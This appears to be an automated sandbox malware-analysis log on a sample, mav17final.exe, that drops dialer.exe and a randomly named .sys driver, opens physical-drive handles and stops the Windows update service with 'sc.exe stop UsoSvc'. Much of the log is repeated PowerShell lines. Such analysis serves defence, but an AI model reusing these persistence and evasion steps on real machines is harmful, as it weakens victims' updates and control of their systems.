      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
      Source: C:\Windows\System32\dwm.exe | Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\dwm.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\dwm.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\dwm.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\dwm.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\dwm.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\dwm.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\dwm.exe | Section loaded: umpdc.dll
      Source: C:\Windows\System32\dwm.exe | Section loaded: mswsock.dll
      Source: C:\Windows\System32\dwm.exe | Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\dwm.exe | Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\dwm.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\System32\dwm.exe | Section loaded: napinsp.dll
      Source: C:\Windows\System32\dwm.exe | Section loaded: pnrpnsp.dll
      Source: C:\Windows\System32\dwm.exe | Section loaded: wshbth.dll
      Source: C:\Windows\System32\dwm.exe | Section loaded: nlaapi.dll
      Source: C:\Windows\System32\dwm.exe | Section loaded: winrnr.dll
      Source: C:\Windows\System32\dwm.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\dwm.exe | Section loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\dwm.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\dwm.exe | Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\dwm.exe | Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\dwm.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\dwm.exe | Section loaded: wbemcomn.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: licensemanagersvc.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: licensemanager.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: clipc.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\dwm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: mav17final.exe | Static PE information: Image base 0x140000000 > 0x60000000
      Source: mav17final.exe | Static file information: File size 13827522 > 1048576
      Source: mav17final.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: mav17final.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: mav17final.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: mav17final.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: mav17final.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: mav17final.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: mav17final.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
      Source: mav17final.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2073274420.00007FF8B9843000.00000002.00000001.01000000.00000009.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: mav17final.exe, 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2072745005.00007FF8B90AC000.00000002.00000001.01000000.0000000B.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2072745005.00007FF8B90AC000.00000002.00000001.01000000.0000000B.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmp
      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: mav17final.exe, 00000000.00000003.1983941024.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: mav17final.exe, 00000000.00000003.1983941024.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2073128104.00007FF8B93C8000.00000002.00000001.01000000.00000008.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: mav17final.exe, 00000002.00000002.2068496795.00007FF8A8CEB000.00000002.00000001.01000000.00000004.sdmp
      Source: mav17final.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: mav17final.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: mav17final.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: mav17final.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: mav17final.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9071270 LoadLibraryA,GetProcAddress,FreeLibrary, 2_2_00007FF8B9071270
      Source: mav17final.exe | Static PE information: section name: _RDATA
      Source: libcrypto-1_1.dll.0.dr | Static PE information: section name: .00cfg
      Source: libssl-1_1.dll.0.dr | Static PE information: section name: .00cfg
      Source: python311.dll.0.dr | Static PE information: section name: PyRuntim
      Source: VCRUNTIME140.dll.0.dr | Static PE information: section name: _RDATA
      Source: dialer.exe.2.dr | Static PE information: section name: .00cfg
      Source: dialer.exe.9.dr | Static PE information: section name: .00cfg
      Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA7F018 push rax; retf 0000h 0_2_00007FF79EA7F019
      Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B909D418 push rsi; retf 2_2_00007FF8B909D419
      Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B909D390 push rsi; iretd 2_2_00007FF8B909D3A5
      Source: C:\Windows\System32\conhost.exe | Code function: 64_2_0000000140001394 push qword ptr [0000000140009004h]; ret 64_2_0000000140001403

      Persistence and Installation Behavior

      Source: C:\Users\user\Desktop\mav17final.exe | Code function: swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,CloseHandle,GetLastError,fprintf,fprintf,fprintf,GetLastError,fprintf,CloseHandle, \\.\PhysicalDrive%d 2_2_00007FF8B9075750
      Source: C:\Users\user\Desktop\mav17final.exe | Code function: swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,CloseHandle,GetLastError,fprintf,fprintf,fprintf,GetLastError,fprintf,CloseHandle, PhysicalDrive%i 2_2_00007FF8B9075750
      Source: C:\Users\user\Desktop\mav17final.exe | Code function: swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,CloseHandle,GetLastError,fprintf,fprintf,fprintf,GetLastError,fprintf,CloseHandle, DeviceIoControl -> ERROR_INVALID_FUNCTION; ignore PhysicalDrive%i 2_2_00007FF8B9075750
      Source: C:\Users\user\Desktop\mav17final.exe | Code function: swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,CloseHandle,GetLastError,fprintf,fprintf,fprintf,GetLastError,fprintf,CloseHandle, DeviceIoControl -> ERROR_NOT_SUPPORTED; ignore PhysicalDrive%i 2_2_00007FF8B9075750
      Source: C:\ProgramData\dialer.exe | File created: C:\Windows\TEMP\ujjtjyeszdwn.sys
      Source: C:\Users\user\Desktop\mav17final.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI19682\_hashlib.pyd
      Source: C:\Users\user\Desktop\mav17final.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI19682\libssl-1_1.dll
      Source: C:\Users\user\Desktop\mav17final.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI19682\_decimal.pyd
      Source: C:\Users\user\Desktop\mav17final.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI19682\_ctypes.pyd
      Source: C:\Users\user\Desktop\mav17final.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI19682\_ssl.pyd
      Source: C:\Users\user\Desktop\mav17final.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI19682\_bz2.pyd
      Source: C:\Users\user\Desktop\mav17final.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI19682\_socket.pyd
      Source: C:\Users\user\Desktop\mav17final.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI19682\libcrypto-1_1.dll
      Source: C:\Users\user\AppData\Local\Temp\dialer.exe | File created: C:\ProgramData\dialer.exe
      Source: C:\Users\user\Desktop\mav17final.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI19682\pyexpat.pyd
      Source: C:\Users\user\Desktop\mav17final.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI19682\unicodedata.pyd
      Source: C:\ProgramData\dialer.exe | File created: C:\Windows\Temp\ujjtjyeszdwn.sys
      Source: C:\Users\user\Desktop\mav17final.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI19682\_lzma.pyd
      Source: C:\Users\user\Desktop\mav17final.exe | File created: C:\Users\user\AppData\Local\Temp\dialer.exe
      Source: C:\Users\user\Desktop\mav17final.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI19682\select.pyd
      Source: C:\Users\user\Desktop\mav17final.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI19682\python311.dll
      Source: C:\Users\user\Desktop\mav17final.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI19682\VCRUNTIME140.dll
      Source: C:\Users\user\Desktop\mav17final.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI19682\libffi-8.dll
      Source: C:\Users\user\Desktop\mav17final.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI19682\psutil\_psutil_windows.cp311-win_amd64.pyd
      Source: C:\Users\user\Desktop\mav17final.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI19682\_elementtree.pyd

      Boot Survival

      Source: C:\Users\user\Desktop\mav17final.exe | Code function: swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,CloseHandle,GetLastError,fprintf,fprintf,fprintf,GetLastError,fprintf,CloseHandle, \\.\PhysicalDrive%d 2_2_00007FF8B9075750
      Source: C:\Users\user\Desktop\mav17final.exe | Code function: swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,CloseHandle,GetLastError,fprintf,fprintf,fprintf,GetLastError,fprintf,CloseHandle, PhysicalDrive%i 2_2_00007FF8B9075750
      Source: C:\Users\user\Desktop\mav17final.exe | Code function: swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,CloseHandle,GetLastError,fprintf,fprintf,fprintf,GetLastError,fprintf,CloseHandle, DeviceIoControl -> ERROR_INVALID_FUNCTION; ignore PhysicalDrive%i 2_2_00007FF8B9075750
      Source: C:\Users\user\Desktop\mav17final.exe | Code function: swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,CloseHandle,GetLastError,fprintf,fprintf,fprintf,GetLastError,fprintf,CloseHandle, DeviceIoControl -> ERROR_NOT_SUPPORTED; ignore PhysicalDrive%i 2_2_00007FF8B9075750
      Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9078F50 StartServiceA,CloseServiceHandle,CloseServiceHandle, 2_2_00007FF8B9078F50
      Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA450D0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00007FF79EA450D0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
